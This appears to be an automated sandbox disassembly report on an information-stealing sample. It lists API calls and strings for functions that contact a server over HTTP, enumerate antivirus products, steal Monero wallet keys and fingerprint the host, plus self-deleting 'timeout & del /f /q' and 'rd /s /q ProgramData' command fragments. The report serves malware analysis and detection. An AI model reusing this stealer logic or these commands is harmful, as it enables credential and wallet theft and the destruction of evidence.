Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s$H_prologlstrlen
String ID: false$true
API String ID: 49562497-2658103896
Opcode ID: 54a2990e2d59dcf91e4d715dd7bbc47d23edf88fa0782b74a2da57a780f32233
Instruction ID: 089701835500e5426664cf922ef315e2898dfa839799ff91f2ace4a6e9704c40
Opcode Fuzzy Hash: 54a2990e2d59dcf91e4d715dd7bbc47d23edf88fa0782b74a2da57a780f32233
Instruction Fuzzy Hash: C6C16F71800109AFDF14EFA5DC45EDE77B9AB54308F10446EF415F3292EA38AB89CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00404EF2 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 174networkfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00404EF7

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 00403A07: _EH_prolog.MSVCRT ref: 00403A0C
Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A3E
Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A47
Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A50
Part of subcall function 00403A07: lstrlen.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403A6A
Part of subcall function 00403A07: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403A7A

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F5A
StrCmpCA.SHLWAPI(?), ref: 00404F6E
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404F91
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FC7
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404FEB
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404FF6
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405014
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040509A
InternetCloseHandle.WININET(00000000), ref: 004050A5
InternetCloseHandle.WININET(?), ref: 004050AE
InternetCloseHandle.WININET(?), ref: 004050B7

Strings

ERROR, xrefs: 00405021
GET, xrefs: 00404FBF
ERROR, xrefs: 00405108

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$H_prologOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 2435781452-2509457195
Opcode ID: 3d4d4fbf26e2ebf7978a75a9513504c8807dfac8bef4b05161d3d4dffaa68466
Instruction ID: 79a678b2a0cc494efcc75dc192dd75b184ed620f9fc102e1b788574175dbcc72
Opcode Fuzzy Hash: 3d4d4fbf26e2ebf7978a75a9513504c8807dfac8bef4b05161d3d4dffaa68466
Instruction Fuzzy Hash: 2C514B72900119AFEF11EFA1DC85EEEBB79EB14704F10446AF901B3291DB785E448BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041212F Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00412134
memset.MSVCRT ref: 00412154
memset.MSVCRT ref: 00412160
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 00412175

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

ShellExecuteEx.SHELL32(0000003C), ref: 00412301
memset.MSVCRT ref: 0041230E
memset.MSVCRT ref: 0041231C
ExitProcess.KERNEL32 ref: 0041232D

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

Strings

/c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00412255
" & rd /s /q "C:\ProgramData\, xrefs: 004121EB
/c timeout /t 10 & del /f /q ", xrefs: 0041219B
" & exit, xrefs: 0041223E
" & exit, xrefs: 004122A2
<, xrefs: 004122DC

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpymemset$H_prolog$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
API String ID: 1312519015-206210831
Opcode ID: 079a472300c27e88ffed433689cc8301d48fc7e5681a3338de1409c8953012c6
Instruction ID: a95e39b80cde994f58bb11824b5be420eb5c6529c63548b5b8daa7a73a06ae64
Opcode Fuzzy Hash: 079a472300c27e88ffed433689cc8301d48fc7e5681a3338de1409c8953012c6
Instruction Fuzzy Hash: 9F5121B1C0024CEADB05EBE1C986AEEBBBCAF14304F54446EA505B3182DB785B59CB75

Uniqueness

Uniqueness Score: -1.00%

Function 0040F3CB Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 116comCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040F3D0
CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00424504,00000000,?,00000000), ref: 0040F3E0
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00424504), ref: 0040F3F1
CoCreateInstance.OLE32(00424EE8,00000000,00000001,00424E18,?,?,00000000,?,Work Dir: In memory,00000000,?,00424504,00000000,?,00000000), ref: 0040F40B
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00424504,00000000), ref: 0040F441
VariantInit.OLEAUT32(?), ref: 0040F490

Part of subcall function 0040F70F: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,0040F4B6,?,?,00000000,?,Work Dir: In memory,00000000,?,00424504,00000000,?,00000000), ref: 0040F717
Part of subcall function 0040F70F: CharToOemW.USER32(?,00000000), ref: 0040F723

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

VariantClear.OLEAUT32(?), ref: 0040F4C4

Strings

displayName, xrefs: 0040F4A2
root\SecurityCenter2, xrefs: 0040F41E
Unknown, xrefs: 0040F4CC
WQL, xrefs: 0040F456
Select * From AntiVirusProduct, xrefs: 0040F451
Unknown, xrefs: 0040F4D3

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateH_prologInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 3694693100-2776955613
Opcode ID: 894f7d78f336269578b6be0df3461f30d148b76dc4dd98a4a7241ccd7c9a342a
Instruction ID: 7c94074b8788e290bbbac647dbb775cc57d783b3226285f7529473d301ade818
Opcode Fuzzy Hash: 894f7d78f336269578b6be0df3461f30d148b76dc4dd98a4a7241ccd7c9a342a
Instruction Fuzzy Hash: D9313A71A41229BBDB20DB91DC49EEF7F78FF49B50F10452AF515B6280C7789601CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB55 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 178registrystringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040EB5A

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,004241CF,00000000,00000000), ref: 0040EBA2
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 0040EBEC
wsprintfA.USER32 ref: 0040EC16
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0040EC33
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 0040EC5D
lstrlen.KERNEL32(?), ref: 0040EC72
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00424200), ref: 0040ECF2

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Strings

?, xrefs: 0040EB98
%s\%s, xrefs: 0040EC10
- , xrefs: 0040ECFC

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenQueryValuelstrcpy$EnumH_prologlstrlenwsprintf
String ID: - $%s\%s$?
API String ID: 404191982-3278919252
Opcode ID: d5c9b3819611949e53c760e709a4fbd40657d89aa9f1208d49f3daee27195a02
Instruction ID: 99bb9dff017734bbee94ef9c19374972677afa949dcf6876cc7056feb3432fab
Opcode Fuzzy Hash: d5c9b3819611949e53c760e709a4fbd40657d89aa9f1208d49f3daee27195a02
Instruction Fuzzy Hash: 9D71077280021DEEDF05EFA2DD84AEEBBBDFF18304F14446AE505B2191DB385A19CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040E050 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 172COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040E055
??_U@YAPAXI@Z.MSVCRT ref: 0040E06B
OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000), ref: 0040E08D
memset.MSVCRT ref: 0040E0CF
??_V@YAXPAX@Z.MSVCRT ref: 0040E208

Part of subcall function 0040DF0D: strlen.MSVCRT ref: 0040DF24

Part of subcall function 0040DBBC: memcpy.MSVCRT ref: 0040DBDC

Strings

N0ZWFt, xrefs: 0040E172, 0040E17F
65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040E0E7, 0040E1D0

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologOpenProcessmemcpymemsetstrlen
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
API String ID: 3050127167-1622206642
Opcode ID: f71852b4dc57eaefec0a5939e57b522f91c5d7858faa335481137a491dd5dbd4
Instruction ID: c7133534bbbd3e2470f914545098ef9dffeb47121235e0abce75ea37944e2468
Opcode Fuzzy Hash: f71852b4dc57eaefec0a5939e57b522f91c5d7858faa335481137a491dd5dbd4
Instruction Fuzzy Hash: 9B51A071E04119AEDB10EB91DC82EEEBBB9EF44354F10047EF111B62C1DA795E88CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040EFC1 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 123memorystringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040EFC6
GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,?,00000000), ref: 0040EFE9
GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0040F01B
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0040F05E
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 0040F065
wsprintfA.USER32 ref: 0040F091
lstrcat.KERNEL32(00000000,004241A8), ref: 0040F0A0

Part of subcall function 0040EF86: GetCurrentHwProfileA.ADVAPI32(?), ref: 0040EF97

lstrlen.KERNEL32(00000000), ref: 0040F0BF

Part of subcall function 0040FBD6: malloc.MSVCRT ref: 0040FBE4
Part of subcall function 0040FBD6: strncpy.MSVCRT ref: 0040FBF4

lstrcat.KERNEL32(00000000,00000000), ref: 0040F0EC

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Strings

C, xrefs: 0040EFF3
:\, xrefs: 0040F011

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heaplstrcat$AllocCurrentDirectoryH_prologInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
String ID: :\$C
API String ID: 688099012-3309953409
Opcode ID: 0bcebe92465a7a92cbea065f3323c3af507c312008c3df8e97f61e22e3136c30
Instruction ID: 21b1a67321f8a6d24ce454ee99169210ff371cc83a106d68236fb6aef6421878
Opcode Fuzzy Hash: 0bcebe92465a7a92cbea065f3323c3af507c312008c3df8e97f61e22e3136c30
Instruction Fuzzy Hash: 92418E72801159AACB11EBE6DD899EFBBBDEF49304F10087EF401B3141DA384A19CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00411B64 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 116stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00411B69

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 00404EF2: _EH_prolog.MSVCRT ref: 00404EF7
Part of subcall function 00404EF2: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F5A
Part of subcall function 00404EF2: StrCmpCA.SHLWAPI(?), ref: 00404F6E
Part of subcall function 00404EF2: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404F91
Part of subcall function 00404EF2: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FC7
Part of subcall function 00404EF2: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404FEB
Part of subcall function 00404EF2: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404FF6
Part of subcall function 00404EF2: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405014

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00411BEB
lstrlen.KERNEL32(00000000), ref: 00411C02

Part of subcall function 0040F7EF: LocalAlloc.KERNEL32(00000040,00411C18,00000001,00000000,?,00411C17,00000000,00000000), ref: 0040F808

StrStrA.SHLWAPI(00000000,00000000), ref: 00411C29
lstrlen.KERNEL32(00000000), ref: 00411C3E
lstrlen.KERNEL32(00000000), ref: 00411C59

Strings

ERROR, xrefs: 00411C84
ERROR, xrefs: 00411C69
ERROR, xrefs: 00411C7D
ERROR, xrefs: 00411BDD
ERROR, xrefs: 00411C8B

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternetlstrcpylstrlen$H_prologOpenRequest$AllocConnectInfoLocalOptionQuerySend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3807055897-1526165396
Opcode ID: 10e399d1f04da16177a1dc4c6de4d81cdc987d3e5c45476915a2faf5dc38b38d
Instruction ID: 41a7fa48013b42fb793d60589e812285dc4a9145a1393323b16df02da28cd504
Opcode Fuzzy Hash: 10e399d1f04da16177a1dc4c6de4d81cdc987d3e5c45476915a2faf5dc38b38d
Instruction Fuzzy Hash: 5141A771901254AACB04FFE2D955BED7BA8EF19308F10446FF905732C1EB785B14C6AA

Uniqueness

Uniqueness Score: -1.00%

Function 00401C4C Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 160stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00401C51
memset.MSVCRT ref: 00401C6F

Part of subcall function 00401077: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401C88,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040108B
Part of subcall function 00401077: HeapAlloc.KERNEL32(00000000,?,?,?,00401C88,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401092
Part of subcall function 00401077: RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401C88,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 004010AB
Part of subcall function 00401077: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401C88,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 004010C4

lstrcat.KERNEL32(?,00000000), ref: 00401C93
lstrlen.KERNEL32(?,?,?,?,?,?,?), ref: 00401CA0
lstrcat.KERNEL32(?,.keys), ref: 00401CBB

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

Part of subcall function 0040F5DE: _EH_prolog.MSVCRT ref: 0040F5E3
Part of subcall function 0040F5DE: GetSystemTime.KERNEL32(?,00424398,00000000,00000001,00000000,004244BE,004244B3,004244B2,00000000,00000000), ref: 0040F623

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 00406138: _EH_prolog.MSVCRT ref: 0040613D
Part of subcall function 00406138: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406160
Part of subcall function 00406138: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406177
Part of subcall function 00406138: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406193
Part of subcall function 00406138: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 004061AD
Part of subcall function 00406138: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004061CE

memset.MSVCRT ref: 00401E3F

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023

Strings

\Monero\wallet.keys, xrefs: 00401CE4
wallet_path, xrefs: 00401C74
.keys, xrefs: 00401CAF
SOFTWARE\monero-project\monero-core, xrefs: 00401C79

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrcat$File$AllocCreateHeaplstrlenmemset$CloseHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 1518627966-218353709
Opcode ID: 846c5179dac43e1cc9e1acf48b7cd4aaa31981977699ce3e04ea74058f54095e
Instruction ID: 77cbf698dbc2ebeb1d93bf6e0acc2ad49f70a310cf74dac5adb55abea99cd855
Opcode Fuzzy Hash: 846c5179dac43e1cc9e1acf48b7cd4aaa31981977699ce3e04ea74058f54095e
Instruction Fuzzy Hash: 02515271D00248EACB04EBE5D846BDDBB78AF18308F54446EF905B31D2DB785719CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00404D92 Relevance: 15.1, APIs: 10, Instructions: 116networkfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00404D97

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 00403A07: _EH_prolog.MSVCRT ref: 00403A0C
Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A3E
Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A47
Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A50
Part of subcall function 00403A07: lstrlen.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403A6A
Part of subcall function 00403A07: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403A7A

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404DE6
StrCmpCA.SHLWAPI(?), ref: 00404E00
